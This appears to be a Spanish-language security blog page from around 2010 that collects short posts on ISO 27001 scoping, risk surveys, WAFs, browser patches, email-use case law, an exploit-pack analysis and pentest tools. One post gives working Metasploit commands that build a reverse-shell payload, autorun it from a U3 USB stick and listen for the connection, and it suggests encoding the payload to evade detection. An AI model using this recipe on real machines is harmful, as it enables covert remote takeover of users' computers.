Problemas para definir el alcance de la norma ISO 27001

Probablemente, usted ya sabía que el primer paso en la implementación de la norma ISO 27001 era la definición del alcance. Lo que tal vez no sabía era que este paso, aunque parezca sencillo a primera vista, a veces le puede ocasionar bastantes problemas. Por ejemplo, muchas compañías tratan de disminuir sus costos de implementación acotando el alcance, pero, generalmente, se encuentran con que ese alcance termina siendo un dolor de cabeza.

Entonces, ¿dónde está el problema?
El problema que se presenta cuando el alcance de la ISO 27001 no abarca a toda la organización es que el Sistema de Gestión de Seguridad de la Información (SGSI) tiene que interactuar con el mundo “exterior”. En ese contexto, el mundo exterior no son sólo los clientes, socios, proveedores, etc., sino también los departamentos de la organización que no están dentro del alcance definido. Puede parecer gracioso, pero un departamento que no está incluido en el alcance debe ser tratado de la misma forma que un proveedor externo.

Por ejemplo, si decide que sólo el departamento de TI esté dentro del alcance, y este departamento utiliza los servicios del sector Compras, el departamento de TI debe realizar la evaluación de riesgos sobre el sector Compras para identificar si existe algún riesgo para la información de la que es responsable el departamento de TI. Además, ambas áreas deben firmar acuerdos de términos y condiciones por los servicios brindados.

¿Por qué es necesario este gasto operativo? Póngase en el lugar del organismo de certificación: debe certificar que, dentro del alcance definido, usted puede administrar la información de forma segura, pero no puede verificar ninguno de los otros departamentos que están fuera del alcance. La única forma de manejar una situación de este tipo es tratando a esos departamentos como si fueran compañías externas. (Aclaración: a los auditores de certificación no les gusta un alcance acotado.)

Pero este no es todo el problema. A veces, un alcance muy acotado directamente no es posible porque no hay interacción con el mundo exterior. Por ejemplo, si los empleados de áreas que se encuentran dentro y fuera del alcance trabajan en la misma habitación, un alcance de este tipo es muy poco factible. Si ambos empleados utilizan la misma red local (sin división) y tienen acceso a diversos servicios de red, un alcance definido de esta forma, definitivamente, no es posible; no hay forma de que usted pueda controlar el flujo de información solamente dentro del ámbito del alcance que ha definido.

El punto aquí es que, a veces, resulta imposible acotar el alcance de su SGSI y, en la mayoría de los casos, le ocasionará costos operativos innecesarios. Por lo tanto, lo que inicialmente no parecía una buena idea podría ser, después de todo, la solución óptima: intente extender el alcance a toda la organización. Como regla general: si su organización tiene no más de unos pocos cientos de empleados y una o unas pocas ubicaciones, lo mejor sería que el SGSI cubra a toda la organización.

En cambio, si realmente no es posible incluir a toda la organización dentro del alcance de su SGSI, intente acotarlo a una unidad de la organización que sea suficientemente independiente. Intente resolver las relaciones con otras unidades que se encuentran afuera del alcance determinando sus servicios mediante documentos internos (políticas, procedimientos, etc.) que podrían utilizarse como “acuerdos”; de esta forma, podría documentar las obligaciones de esas unidades de la organización de una forma que sea útil para las actividades diarias.

Ahí lo tiene, ha resuelto el primer paso en la implementación de la norma ISO 27001.

This post is also available in: Inglés, Croata


« Cinco consejos para realizar con éxito un Análisis de impactos en el negocio

Fuente: blog.iso27001standard.com/

Los 10 mayores riesgos del negocio de las telecomunicaciones para el 2010 (Ernst & Young )

To help telco operators succeed in taking their businesses forwards, and in making the most of the growth opportunities that emerge, we've identified the top 10 key risks affecting the industry. Learn about the risks, how each ranked and how to formulate the right responses according to your own risk profile

The Ernst & Young risk radar presents a snapshot of the top 10 business risks in an industry sector, by dividing risks into four quadrants that correspond to the Ernst & Young Risk Universe™ model:

• Strategic threats — related to customers, competitors and investors chain of a business
• Compliance threats — originating in politics, law, regulation or corporate governance
• Operational threats — impacting the processes, systems, people and overall value
• Financial threats — stemming from volatility in markets and the real economy

This chart plots the top 10 risks for telecoms operators on the risk radar and lists the risks that are currently just “below the radar.”

By understanding and addressing the top 10 risks affecting the sector, telecoms providers will be better positioned to take their businesses forward and make the most of growth opportunities.

While strategic risks remain critically important, many companies have been continuing to focus on the easier-to-manage areas of operational risk.

In particular, the increasing role played by technology and device providers in shaping the customer experience and building customer loyalty means operators face a real danger of losing customer ownership. Companies that focus primarily on operational risk may fail to respond adequately to this danger.

Top 10 business risks for telecoms operators
1.	Losing ownership of the client
2.	Failure to maximize customer value
3.	Rising regulatory pressures
4.	Ineffective infrastructure investment
5.	Inability to contain and reduce costs
6.	Lack of talent and innovation
7.	Inability to manage investor expectations
8.	Inappropriate systems and processes
9.	Poorly managed M&A and partnerships
10.	Privacy, security and piracy risks

Download - Top 10 risks in telecommunications: 2010 as a printable document (2.8 MB PDF)

More...

Encuesta 2010 sobre Protección de la Información en las PYMES (Symantec)

El estudio de Symantec muestra que las PYMES están tomando en serio la Protección de la Información. Las PYMES gastan en promedio aproximadamente US$51.000 al año en protección de la información. El estudio se basa en encuestas realizadas en mayo de 2010 a 2.152 ejecutivos de PYMES y personal de TI encargado de la toma de decisiones en 28 países en mayo de 2010.

El estudio reveló que las pequeñas y medianas empresa (PYMES con 10 a 499 empleados) ahora están haciendo de la protección de la información la máxima prioridad de TI, en contraposición a hace 15 meses, cuando un alto porcentaje no había podido implementar las protecciones más básicas.
Este cambio tiene sentido puesto que las PYMES enfrentan mayores amenazas de ataques cibernéticos, perdida de dispositivos y pérdida de datos confidenciales o protegidos.

Principales aspectos del Estudio:Las PYMES encuestadas mostraron mayor interés y mayor inversión en protección de la información. Califican la pérdida de datos y los ciberataques como los mayores riesgos empresariales, antes que la tradicional actividad criminal, los desastres naturales y el terrorismo.
La pérdida de información crítica amenaza a las PYMES. Setenta y cuatro por ciento de las PYMES encuestadas está preocupadas o extremadamente preocupadas por la pérdida de información electrónica
Los ciberataques son una amenaza crítica para las PYMES. Setenta y tres por ciento de los encuestados fueron víctimas de ataques cibernéticos el año pasado. Treinta por ciento de esos ataques fueron considerados exitosos o extremadamente exitosos.

Recomendaciones de Symantec

- Capacitar a los empleados: desarrollar el reglamento de seguridad en Internet y capacitar a los empleados sobre la seguridad, la protección y las últimas amenazas en Internet.
Proteger información empresarial importante: la protección de la información es fundamental para las empresas de todos los tamaños y la información confidencial de las PYMES enfrenta mayores riesgos.
- Implementar un plan eficaz de copias de respaldo y recuperación: la protección de la información no se limita a la implementación de una solución antivirus.
- Proteger los recursos del correo electrónico y web: seleccionar una solución de seguridad Web y de correo electrónico que pueda ayudar a mitigar el spam y las amenazas al correo electrónico para que las PYMES puedan proteger la información confidencial y dedicar más tiempo a sus actividades diarias.


Descargue el PDF - Encuesta 2010 sobre Protección de la Información en las PyMEs (en inglés)

Número 28 de e.Security (Junio 2010)

Ya puedes descargarte el último ejemplar de una de las revistas más actualizada en seguridad de la información.

Sumario:
- Las claves para una mayor Seguridad IT
- Eficiencia tecnológica en los centro de datos
- CSiRt, centros de Respuesta a incidentes de Seguridad
- Entrevistas
- Noticias


Visor e.Security
PDF Descargar


Numeros anteriores...

Web Application Firewall (WAF)

¿ Qué es un Web Application Firewall (WAF) ?

• - Appliance o Server Plugin que filtra o aplica reglas a una transacción HTTP.
• - Reglas basadas en ataques conocidos (ej: XSS o Inyecciones SQL)
• - Ofrece protección contra vulnerabilidades conocidas.
• - Ayuda con Sistemas Legacy y Productos de terceros (código no disponible)
  

Los cortafuegos tradicionales trabajan en la capa de red y de transporte, pero al dejar el puerto 80 abierto no ofrecen ninguna clase de protección para la aplicación frente a estos ataques especializados en explotar vulnerabilidades web. Hasta la aparición de los cortafuegos de aplicaciones web (Web Application Firewall o WAF), este tipo de protección sólo se podía realizar manualmente mediante una auditoría técnica y posterior revisión del código de las aplicaciones examinadas. Gracias a los WAF, este nivel de protección puede alcanzarse mediante un proceso automático y de mayor fiabilidad, sin necesidad de involucrar a los desarrolladores ni modificar las aplicaciones.

Mas ...
- Más allá del IPS: WAF (Web Application Firewall)

- Web Application Firewalls - Cómo proteger sus aplicaciones Web? Parte 1 y 2

- Web Application Firewall (Wikipedia)

Web Application Firewall (WAF) – A Critical Defence for an “Information-Centric World”

View more presentations from Frost & Sullivan .

Firefox 3.6.4 incorpora protección contra fallos y corrige diversas vulnerabilidades

Tras varios aplazamientos, Mozilla ha publicado la versión 3.6.4 de Firefox, la última actualización de seguridad y estabilidad para la rama 3.6.x de Firefox. Firefox 3.6.4 corrige más de 225 fallos encontrados en la actualización anterior, solucionando diversas vulnerabilidades críticas de seguridad e incluyendo una nueva tecnología de protección contra fallos de “Mozilla Lorentz Project”.

Lorentz está diseñado para brindar el aislamiento de procesos en Firefox, separando las páginas web y los plug-ins del navegador principal ejecutándolas en sus propios procesos. Cuando una página web o plug-in falla, con el aislamiento de procesos el resto del navegador no se ve afectado por el fallo, por lo que el navegador se vuelve más seguro.

Actualmente, la protección sólo funciona para Adobe Flash, Apple Quicktime y Microsoft SilverLight en sistemas Windows y Linux. Sin embargo, los desarrolladores apuntan que el soporte para otros plug-ins y sistemas operativos será añadido en futuras actualizaciones.

La actualización 3.6.4 corrige un total de siete vulnerabilidades, cuatro de las cuales han sido calificadas como críticas. Contrariamente a lo que se creía, el fallo de URL spoofing descubierto por Michal Zalewski (y al parecer, también por Robert Hansen (descripción)) no ha sido corregido en esta actualización. Los detalles de este problema han sido publicados y Mozilla ha confirmado que lo corregirá en la versión 3.6.6 de Firefox (ya que la versión 3.6.5 se omitirá). Safari también ha comunicado un problema similar.


Visto en www.protegetuordenador.com

Insecure Magazine # 26 (Junio 2010)

Contenido:

• - PCI: Security's lowest common denominator


• - Analyzing Flash-based RIA components and discovering vulnerabilities


• - Logs: Can we finally tame the beast?


• - Launch arbitrary code from Excel in a restricted environment


• - Placing the burden on the bot


• - Data breach risks and privacy compliance


• - Authenticating Linux users against Microsoft Active Directory


• - Hacking under the radar


• - iPhone backup, encryption and forensics


• - AND MORE!
  

Download

Ingeniería social: la amenaza oculta es la más peligrosa

En los últimos tres años el grueso de las empresas ha invertido en la seguridad de su información Ahora, ni siquiera es necesario ingresar a la organización para acceder a sus datos Para las organizaciones, las recomendaciones generales son: Concientizar permanentemente a los empleados, clientes y proveedores acerca de los riesgos inherentes a las distintas actividades.

• Implementar, controlar y mejorar políticas y procedimientos específicos para la seguridad de la información en todas las áreas de la empresa.
• Utilizar la información de los elementos de control tecnológico para medir posibles brechas de seguridad asociadas a la ingeniería social.
• Contar con apoyo externo especializado para realizar auditorías y análisis de riesgo periódicos que incluyan tanto a la infraestructura tecnológica como los procesos y procedimientos. Para los usuarios individuales, podemos recomendar: w Ser extremadamente cuidadoso con la información pública que se almacena en redes sociales.
• No llevar información confidencial fuera de la empresa (siempre debería ser posible acceder en forma remota).
• Habilitar las conexiones Wi-Fi en las PDA y notebooks solamente cuando estos dispositivos se están utilizando.
• Participar de todas las actividades de concientización que se ofrecen tanto en la propia organización como a través de medios especializados en seguridad de la información. w Gerente Data Center, Seguridad y Outsourcing para Latinoamérica de Global Crossing Gabriel Marcos

Más...

Visto en elmundo.com.ve

Mejorarán la seguridad informática del Estado (Uruguay)

A diario "hay situaciones que amenazan la seguridad informática de organismos del Estado", una situación que el gobierno pretende revertir con un plan de "mejora" que abarcará a varias reparticiones.
Para ello, la Agencia de Gobierno Electrónico y Sociedad de la Información (Agesic) convocó a una licitación pública que tiene como objetivo contratar servicios de consultoría. Las ofertas se abrirán el 12 de julio.

A su vez, también se plantean optimizar los contenidos de los portales estatales. Con ese objetivo, Agesic efectuó un llamado a expresiones de interés para incluir en su registro a consultoras que puedan efectuar un diagnóstico del contenido de las webs de entre seis y diez organismos de la administración pública. Dentro de las tareas previstas, deberán diseñar una "nueva arquitectura", presentar un proyecto y llevarlo adelante. Para ello, se estima un presupuesto de US$ 100.000 IVA incluido.

"24 HORAS". El pasado 25 de abril un habilidoso hacker logró violar la seguridad de la página web del Ministerio del Interior. Poco antes, en marzo de este año, le tocó al portal del Ministerio de Turismo, que ya había sido violentado en octubre de 2009. En ese entonces, las eliminatorias para el Mundial de fútbol de Sudáfrica estaban en su fase final; el hacker dejó un mensaje que decía: "Vamos - Argentina - Carajo" además de un video de YouTube con imágenes ganadoras de la selección de fútbol del vecino país.

Más...

Fuente: Elpais.com.uy

Revista Electrónica El Derecho Informático Nº 4 - Edición Junio 2010

Se publico el número 4 de la Revista Electrónica El Derecho Informático.

En este número podrás encontrar:

• - Delitos Informáticos: Publicación abusiva de correspondencia. Por Abog. Alejandro Kohen y Abog. Pablo Lucero (Argentina)
• - La Sociedad de la Información y los fundamentos del Derecho Internacional Privado. Por Abog. Corina Iuale (Argentina)
• - Google y sus acuerdos con a los autores y titulares de derechos. Parte 1. Por Abog. Wilson Rios (Colombia)
• - Legales & IT: ¿convivencia o disputa?. Por Consultor IT Matias Katz (Argentina)
• - ¿Busca o Especialista?. Por Abog. Jorge Yunes (Argentina)
• - El contrato de Escrow: una solución frente a las pruebas de autoría... (Parte 2 de 3). Por Abog. Luis Manuel Tolmos (España)
• - Entrevista a Cont. Alberto Elisavetsky (Argentina)

Acceso on Line

Descarga Revista El Derecho Informático Nº 4 - Mayo 2010

Inteligencia y nivel de explotación según Siberia Exploit Pack

Siberia Exploit Pack es un crimeware, evolución de Napoleon Exploit Pack, del cual ya he hecho una breve descripción en otra oportunidad. Sin embargo, desde el momento de esa descripción hasta estos días, el panorama de su desarrollador se ha ampliado.

En este sentido y si bien termina siendo uno más del montón, lo interesante de este crimeware es la información que proporciona su panel de estadísticas (la inteligencia para el atacante), dicho sea de paso muy similar al provisto por Eleonore Exploit Pack, donde se ofrecen datos relativos al éxito de explotación que tiene el exploit pack para el reclutamiento zombi, discriminando estos datos en función de:

• Países afectados
• Sistemas operativos más explotados
• Referencia de los dominios con mayor porcentaje a través de los cuales se explotan vulnerabilidades
• Navegadores más explotados
• Exploits pre-compilados en esta versión del paquete

Déjenme insistir (porque no es un dato menor) con que este acopio de información no es más que hacer inteligencia, lo cual le permite al atacante conocer, en primera instancia:

En el primero de los casos, la población de qué país es más vulnerable, quizás por su nivel de piratería, lo cual pone sobre relieve la falta de actualizaciones de seguridad de los sistemas operativos y de las aplicaciones, ya que como veremos al llegar a los exploits, todos estos son conocidos y cuentan desde hace mucho tiempo con el correspondiente parche que soluciona la vulnerabilidad.

En este caso, los primeros cinco países donde este crimeware tiene mayor tasa de infección son: Estados Unidos, Inglaterra, Canadá, Rusia y Alemania.

El mismo criterio se persigue con los datos recavados sobre los sistemas operativos “más vulnerables”, entre comillas porque, como dije anteriormente, el grado de vulnerabilidad del OS depende directamente de una serie de aspectos que deberían estar contemplados en el hardening, dentro del cual un factor importante es la implementación de los parches de seguridad.

Por ejemplo, la vulnerabilidad en MDAC (Microsoft Data Access Components) data del año 2006 (cuatro años), descrita en Boletín Oficial de Microsoft MS06-014. El impacto que sobre los sistemas operativos tiene esta versión del crimeware, la podemos observar en la siguiente imagen.

La lista de sistemas operativos atacados es amplia y los tres que poseen mayor brecha de vulnerabilidad pertenecen a la familia de Microsoft (lo que es lógico debido a la masividad de uso), además de otros también de MS.

Sin embargo, el crimeware contempla otros sistemas operativos no Windows, incluyendo los de consolas PlayStation (GNU/Linux o Black Rhino) y Nintendo Wii (irónicamente una versión modificada de una distribución GNU/Linux), en el caso de Workstations y OS utilizado en telefonía celular de alta gama, entre ellos:

• Mac OS
• GNU/Linux
• FreeBSD
• iPhone
• Windows Mobile
• Windows CE
• Pocket PC
• Symbian OS

Aquí ya comenzamos a reconocer que los delincuentes han ampliado el horizonte de cobertura, incorporando en su cartera de opciones la explotación de vulnerabilidades (a través del navegador) y reclutamiento de zombis en otros sistemas operativos empleados en otras tecnologías informáticas.

Más...



Fuente: MalwareIntelligence (*)

(*) MalwareIntelligence es un sitio dedicado a la investigación sobre todas las cuestiones relacionadas con criminología informática, seguridad de la información en general y seguridad antimalware en particular, siempre desde una perspectiva estrechamente relacionado con el campo de inteligencia.

II Encuesta Latinoamericana de Seguridad de la Información - ACIS 2010

Como parte fundamental de las X Jornadas Nacionales de Seguridad Informática, realizadas por la Asociación Colombiana de Ingenieros de Sistemas - ACIS (Bogotá, Colombia) se publico el resultado base de los análisis realizados en la II Encuesa Latinoamericana de Seguridad de la Información.

En este estudio se advierten interesantes resultados que deberían ser objeto de reflexiones y consideraciones para ver frente a las tendencias identificadas y referentes utilizados, cómo avanza la seguridad de la información en la región.

Descarga - Encuesta


Fuente: ACIS

USB U3 con MetaSploit para test de seguridad

En 4 simples pasos vamos a armar un USB U3, para que al ser conectado a una PC, realice una conexión reversa con meterpreter.

La idea es generar con MetaSploit un ejecutable con un payload que genere una conexión reversa al conectar el USB a la PC. Para grabar el payload dentro del U3, vamos a utilizar el programa Universal Customizer.

1. Generamos el Payload con MetaSploit

En este caso vamos a crear un ejecutable con una conexión reversa de meterpreter:

./msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 X > malware.exe

Por supuesto que podemos utilizar cualquier otro payload, como también encodearlo para que sea más difícil su detección.

2. Creamos nuestra ISO

Una vez que bajamos y descomprimimos Universal Customizer, copiamos malware.exe al directorio "U3CUSTOM" y creamos el archivo "autorun.inf" con el siguiente contenido:

[AutoRun]
open=malware.exe

Luego ejecutamos "ISOCreate.cmd" y dentro del directorio "BIN" se va a crear nuestra ISO con el nombre "U3CUSTOM.ISO". Si no creamos nuestra ISO, Universal Customizer va a utilizar la "U3CUSTOM.ISO" que ya viene dentro del paquete, con una versión de Hacksaw.

3. Grabamos la ISO

Luego corremos Universal Customizer y vamos siguiendo los pasos:

Al finalizar, quitamos el USB y cuando lo volvamos a conectar ya tendrá nuestro payload adentro.

4. Escuchamos por la Conexión Reversa

Para finalizar, debemos dejar un listener escuchando por la conexión reversa del payload que grabamos en el U3:

./msfconsole
use exploit/multi/handler
set PAYLAOD windows/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 443
set ExitOnSession false

exploit -j

Eso es todo, una interesante prueba de concepto para probar la seguridad de la PC de un usuario.

LINKS RELACIONADOS:
- Ataques USB con tecnología U3 por Rafael Montero
- USB Keys & Metasploit for fun and profit
- Sallis Usb Hacks
- Universal Customizer

Visto en blog www.KUNGFOOSION.com

JURISPRUDENCIA de USO (¿Abuso?) de Email (Argentina)

Los siguientes son fallos de diferentes salas pertenecientes a la "Cámara Nacional de Apelaciones del Trabajo" de la República Federal Argentina. si uno se pone a revisar los distintos fallos encontrará cierto grado de contradicción entre un fallo y otro, pero a la conclusión a la que nos llevan es que en una empresa se deben tener Políticas, Normas y Procedimientos (PNPs) debidamente Formalizados, Implementados(comunicados al personal) y Actualizados. Las PNPs además deberán incluir aspectos relacionados a la Gestión de la Seguridad Informática tomando como buenas prácticas por ejemplo la ISO 27002.

G.D.M.d.R. c/Y.P.F Yacimientos Petrolíferos fiscales S.A. s/ despido

"Corresponde considerar suficientemente cumplidos los requisitos de causalidad, proporcionalidad y oportunidad en la decisión de la ruptura contractual, si se tiene por acreditado que la actora dedicó cierta cantidad de tiempo durante su jornada de labor en trabajos que ninguna relación tenían con sus funciones y utilizaba para ello los medios de comunicación de la compañía (correo electrónico)."

Pereyra, Leandro Ramiro c/Servicios de Almacen Fiscal Zona Franca y mandatos S.A. s/ despido

"La accionada no ha acreditado que haya dictado norma alguna -escrita o verbal- sobre el uso que debían hacer los empleados del correo electrónico de la misma, con el agravante de que procedió a despedir al actor directamente, sin hacerle ninguna advertencia previa sobre el uso particular del correo electrónico."

V.R.I. c/Vestiditos S.A. s/ Despido
"Considerando que si bien la actora al utilizar en forma indebida la cuenta de correo provista por la empresa puede afirmarse que defraudó la confianza en ella depositada ya que dispendiaba tiempo de trabajo en su beneficio, en la medida en que lo acontecido no fue sino un intercambio de correos electrónicos que no trascendió los límites de la empresa ni tomó estado público, el despido dispuesto deviene una medida excesiva e injustificada."

Acosta, Natalia Mariel c/ Disco S.A. s/ despido
"Se hace lugar a la demanda interpuesta, por cuanto la causa de despido invocada -uso indebido del correo electrónico de la empresa- resulta arbitraria e infundada. Ello, en tanto no se precisó ni se acreditó el contenido de las comunicaciones enviadas por la actora, a qué personal injuria o cuál sería la falta de respeto invocada."

Greppi, Laura Karina c/ Telefónica de Argentina S.A. s/ despido
"Resulta un acto discriminatorio el despido de la reclamante que remitiera una misiva por vía de e-mail a sus compañeros de trabajo instándolos a adoptar acciones colectivas pacíficas en solidaridad con los trabajadores de Aerolíneas Argentinas."

Rojas César Osvaldo c/ G. M. F. s/ daños y perjuicios
"Se hace lugar a la demanda de mala praxis impetrada por la actora contra su abogada al iniciar una demanda laboral en forma extemporánea, y en tanto existían grandes posibilidades de que la demanda prosperara se reconocen los daños y perjuicios reclamados. Ello, considerando que el despido fue causado por la utilización desmedida y constante del mail por parte del trabajador, y que la empresa no invocó al contestar demanda la existencia de reglamentación alguna ni de instrucciones dadas a los empleados acerca del uso del correo electrónico."

Delgado Nancy Marcela c/ Catering Argentina S.A. s/ ordinario – despido
"Trabajador que envía a sus compañeros correo electrónico con contenido pornográfico. Improcedencia del despido cuando dicha práctica es habitualmente tolerada por la empleadora."

Prato Carolina c/ Hoyts General Cinema de Argentina S.A. s/ despido
"Es ajustado a derecho el despido por pérdida de confianza de una trabajadora que no guardó reserva y confidencialidad sobre una comunicación recibida en su correo electrónico."

Fuente: www.leyeslaborales.com.ar

OTROS fallos relacionados
López Marcela Edith c/ C.C.R. S..A. Concord Consumer Comunication Research Development S.A. s/ despido
Castello, Marcelo Jose c/Price Waterhouse & Co. S.R.L. s/ despido

Alvarez Armando Jorge c/ CPC S.A.
B. M. c/ SGS Société Genérale de Surveillance S.A.
C. María c/ Universidad Católica de la Plata
Cabral Zarza Cristina c/ Ambrogi Guillermo
Gelonch Giselle Araceli c/ Carda S.A.
Gonzalez Suarez, Silvana Mariela c/ Almagro Construcciones S.A.
Guila Alejandro Daniel c/ E.P.S.A. Electrical Products S.A.
Guilhem Gastón Damián c/Netpro S.A
Kustner Alejandro c/ Daimler Chrysler Leasing Argentina S.A. y Otros
Lenain María Paula c/ Technisys S.A.
Meek Esteban Hugo c/ Total Austral S.A.
Muñoz Yanina Vanesa c/ Klas Juan y otro
Peiro Ricardo Fernando c/ Ceteco Argentina S.A.
Vidal Gustavo Sergio c/ Microstar S.A.
Viloria Myriam Analia c/ Aseguradora de Créditos y Garantías S.A.

Otros documentos
Uso del Correo Eletronico en el Ambito Laboral (pdf)


Visto en Blog Auditoria, Informática y Fraudes

Proteger a los más pequeños contra los peligros de la Red.

Menores y adultos hablan sobre lo que supone para ellos la seguridad en Internet y cómo proteger a los más pequeños contra los peligros de la Red.

PandaSecurity

Más recursos en el Portal Menor en la Red

CERT Basic Fuzzing Framework

Hi folks. I've been involved in a fuzzing effort at CERT. One of the ways that I've been able to discover vulnerabilities is through "dumb" or mutational fuzzing. We have developed a framework for performing automated dumb fuzzing. Today we are releasing a simplified version of automated dumb fuzzing, called the Basic Fuzzing Framework (BFF).

Dranzer was one of our first fuzz testing projects. By performing automated smart fuzz testing of ActiveX controls, I was able to discover thousands of vulnerabilities. Luckily, Microsoft has made some improvements to Internet Explorer to help minimize the impact of ActiveX vulnerabilities.

Another technique that I've used for discovering vulnerabilities is dumb fuzzing. Don't let the name fool you. Dumb fuzzing has the advantage of being more universal than smart fuzzing. Dranzer is limited in that it tests only ActiveX controls; with dumb fuzzing, you can switch targets easily after your dumb fuzzing environment is complete.

The Basic Fuzzing Framework (BFF) consists of two main parts:

1. a Linux virtual machine that has been optimized for fuzzing
2. a set of scripts and a configuration file that orchestrate the fuzzing run

More...

Sólo se denuncia uno de cada cuatro “ciberdelitos” (Argentina)

Hace dos años, el Congreso los penó con una ley. Pero por desconocimiento o trabas para denunciar, pocos damnificados van a la Justicia. Aun así, sólo en los tribunales porteños ya hay 8.425 casos. El más común: hackear el e-mail o el chat.

Más...

Visto en Clarin.com

Informe: Discriminación en Internet Redes Sociales (INADI)

Buenas Prácticas en la Comunicación Pública
INFORMES INADI
Discriminación en Internet Redes Sociales
Mayo 2010

Los informes INADI son un documento destinado a periodistas y profesionales de la comunicación. Surgen de la voluntad de ayudar a presentar distintas problemáticas que tocan de cerca al Instituto, y que ameritan un tratamiento en profundidad.

Permiten también reflexionar sobre el carácter discriminatorio de muchas prácticas sociales que, muchas veces por desinformación, no son percibidas como tales.

Resumen
¿QUÉ ES EL CIBERACOSO o CYBERBULLYING?

Cyberbullying o Ciberacoso es el uso de información electrónica y medios de comunicación (correo electrónico, redes sociales, blogs, mensajería instantánea, mensajes de texto, teléfonos móviles, y websites) difamatorios, amenazantes, degradantes, agresivos para acosar, intimidar, o amedrentar.

¿CUÁL ES EL ROL DEL INADI ANTE EL CIBERACOSO?

El ciberacoso, cuando no se realiza en función de la pertenencia de el/la acosado/a a un colectivo racial, religioso, sexual, etc., no constituye un acto de discriminación. Por este motivo, la incumbencia específica del INADI debe considerarse en cada caso, según las características de la agresión.

En cuanto a su capacidad de intervenir para lograr la eliminación de contenidos discriminatorios, en el caso deredes sociales, y en particular aquellas que tienen su sede en otros países, la posibilidad e acción del Inadi es muy limitada. El Inadi no puede dar de baja páginas o grupos en Facebook. Su capacidad de acción es algo mayor en otras redes sociales y ante sitios de Internet individuales, pero en ningún caso el Inadi cumple función de policía.

LA NORMATIVA ARGENTINA

No hay legislación específica que regule las actividades en las llamadas redes sociales. En este terreno suelen entrar en colisión el derecho a la libertad de expresión con otros derechos y valores sociales. El INADI recomienda generar una amplia discusión social sobre el tema.


Descarga de Informe

Cómo hacerle frente al Cibercrimen

Recomendaciones de los expertos y la tecnología para pronosticar cuáles serán las principales 7 líneas de acción en las empresas.

Grandes grupos de crimen organizado realizan ataques masivos para obtener información con objetivos económicos, financieros y políticos desde Internet. La venta de información en el mercado negro alcanza un valor cercano a los $7.000 millones de dólares en todo el mundo.

Para el 42% de las compañías los ataques online son la primera de sus preocupaciones. En términos anecdóticos, si tuviesen que elegir de quién se defenderían primero, ¿de un ladrón agujereando sus muros, o de otro agujereando su firewall?, las empresas lo tienen claro, acabarían antes con el segundo. Con este porcentaje, la ciberdelincuencia supera ya en el ranking al crimen tradicional como la principal preocupación de las compañías, por encima de los desastres naturales, el terrorismo y el crimen tradicional combinado.

Este elevado temor tiene una explicación económica. Cada año, las empresas se gastan en promedio $2 millones de dólares (millón y medio de euros) en costes asociados a los ciberataques. Los tres costos principales fueron: productividad, ingresos y pérdida de confianza del cliente según el informe de Symantec 2010 State of Enterprise Security, realizada en enero de este año a 2,100 CIOs (Chief Technology Officer), encargados de seguridad informática y administradores de TI de 27 países, incluidos Argentina, Brasil, Colombia y México.

Lo más preocupante, es que los datos pronostican para el 2010 un aumento de los ciberataques y de los costos asociados: en los últimos 12 meses el 75% de las compañías sufrieron ataques cibernéticos, el 36 % calificaron los ataques como muy dañinos y el 29 % informó que los ataques han sido más frecuentes. Las tres pérdidas más denunciadas fueron el robo de la propiedad intelectual, el robo de información de información financiera, especialmente de las tarjetas de crédito y el robo de la información de identificación personal de clientes.

Más...


Fuente: itenlinea.com

Risk IT Framework in Spanish

The Risk IT Framework fills the gap between generic risk management frameworks and detailed (primarily security-related) IT risk management frameworks. It provides an end-to-end, comprehensive view of all risks related to the use of IT and a similarly thorough treatment of risk management, from the tone and culture at the top, to operational issues. In summary, the framework will enable enterprises to understand and manage all significant IT risk types, building upon the existing risk related components within the current ISACA frameworks, i.e., COBIT and Val IT.

Download (Registration Required, 4.6M)

Download Spanish Version (4.2M)

Download Excerpt (3.6M)

Download Laminate (Member Only, 1.7M)


The Risk IT Practitioner Guide

Book

Cortometraje de Seguridad Informatica titulado "Media Vida", un film de DELACREW

ZeroDayScan – Detecta problemas de seguridad en tu sitio web en forma gratuita

Después de solicitar la inclusión de un archivo de texto en la raiz de nuestro sitio web, ZeroDayScan realiza una serie de análisis que pretenden detectar problemas de seguridad de varios tipos, desde archivos y directorios ocultos hasta problemas de SQL injection o ataques Cross Site Scripting (XSS).

Con informes generados en PDF, el resultado puede tardar hasta 72 horas en ser enviado por email. Disponen de un blog donde explican las novedades y detalles del proyecto, tendremos que estar atentos…

Fuente: wwwhatsnew.com

ZeroDayScan is a revolutionary online web security scanner. It is used by webmasters and security experts to validate security of their websites. Application unique features are:

• No installation is required. It is an online service
• Detects Cross Site Scripting attacks (XSS)
• Detects Hidden Directories and Backup Files
• Looks for Known Security Vulnerabilities
• Searches for SQL Injection Vulnerabilities
• Automatically detects zero day bugs
• Performs Website Fingerprinting
• Generates free PDF reports

Hexjector - Automate site Pentest for SQL Injection Vulnerabilties

Hexjector is an Opensource,Multi-Platform PHP script to automate site Pentest for SQL Injection Vulnerabilties.

Features:
• Check for SQL Injection Vulnerablities.
• Pentest SQL Injection Vulnerablities.
• Detect WAF on the site.
• Scan For Admin Page
• Manual Dump Function
• Browser
• SQL Injection Type Detection

Descarga y Web del proyecto

50% de empresas descuida su información (Mexico)

En México, sólo 50% de las empresas conoce las medidas de seguridad que deben cumplir en cuestión de privacidad y protección de datos de sus clientes, reveló la 12 Encuesta Global de Seguridad de la Información de la firma Ernst &Young.

En conferencia de prensa, el gerente senior de la firma de consultoría, Ricardo Lira, destacó que en 2009 las organizaciones mexicanas registraron un incremento en ataques relacionados con el robo de información.

Así, sólo una de cada cuatro empresas realizó acciones para mitigar el riesgo de represalias por ex empleados, la cual es una de las causas más comunes que ocurre en el robo de información.

A pesar que cada vez más las compañías colocan como elemento principal en su plan de negocios la seguridad de la información que deben manejar en sus operaciones, sólo 10% se preocupa por medir la efectividad de las acciones tomadas.

Más

Fuente: cnnexpansion.com

Robo de tarjetas de credito - Seguridad de la Información

Video que muestra la facilidad con la que pueden ser extraidos los datos de una tarjeta de crédito/debito en cualquier comercio.



CXO Community

Muestra Libro ISO/IEC 20000. Guía completa de aplicación para la gestión de los servicios de tecnologías de la información

El fichero pdf contiene 63 págnias de muestra, e incluye el Capítulo 1 íntegramente del Libro: "ISO/IEC 20000. Guía completa de aplicación para la gestión de los servicios de tecnologías de la información", una muestra de los contenidos de los capítulos de los procesos y además tiene comentarios que explican el motivo de cada tipo de contenido.

